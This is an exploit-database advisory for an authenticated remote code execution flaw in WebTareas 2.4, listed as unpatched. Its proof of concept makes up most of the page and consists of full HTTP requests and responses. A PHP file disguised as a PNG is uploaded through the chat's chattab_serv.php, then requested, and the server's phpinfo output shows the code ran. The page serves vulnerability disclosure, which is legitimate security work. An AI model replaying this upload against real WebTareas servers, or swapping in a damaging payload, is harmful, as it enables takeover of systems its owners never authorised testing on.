WebTareas 2.4 - RCE (Authorized)

vendor:

WebTareas

by:

Hubert Wojciechowski

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: WebTareas

Affected Version From: 2.4

Affected Version To: 2.4

Patch Exists: NO

Related CWE:

CPE: 2.4:webtareas:webtareas:2.4

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2022

WebTareas 2.4 – RCE (Authorized)

A remote code execution vulnerability exists in WebTareas 2.4 due to improper input validation. An attacker can send a maliciously crafted HTTP POST request to the chattab_serv.php script with a specially crafted filename parameter containing PHP code. This code will be executed on the server when the script is executed.

Mitigation:

Input validation should be performed on all user-supplied data to ensure that it does not contain malicious code.

Source

Exploit-DB raw data:

# Exploit Title: WebTareas 2.4 - RCE (Authorized)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example in forum -> members forum -> chat
-----------------------------------------------------------------------------------------------------------------------
Param: chatPhotos0
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /webtareas/includes/chattab_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126
Content-Length: 6852
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="action"

sendPhotos
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatTo"

2
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatType"

P
-----------------------------13392153614835728094189311126
Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"
Content-Type: image/png

PNG
[...]
<?php phpinfo();?>
[...]

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:27:41 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 661
Connection: close
Content-Type: application/json

{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}

-----------------------------------------------------------------------------------------------------------------------
See link: /files\/Messages\/7.php
-----------------------------------------------------------------------------------------------------------------------
Req:
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/files/Messages/7.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=add
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 11:28:16 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89945
[...]
<title>PHP 7.4.30 - phpinfo()</title>
[...]
<h1 class="p">PHP Version 7.4.30</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr>
<tr><td class="e">Build Date </td><td class="v">Jun  7 2022 16:22:15 </td></tr>
<tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 
[...]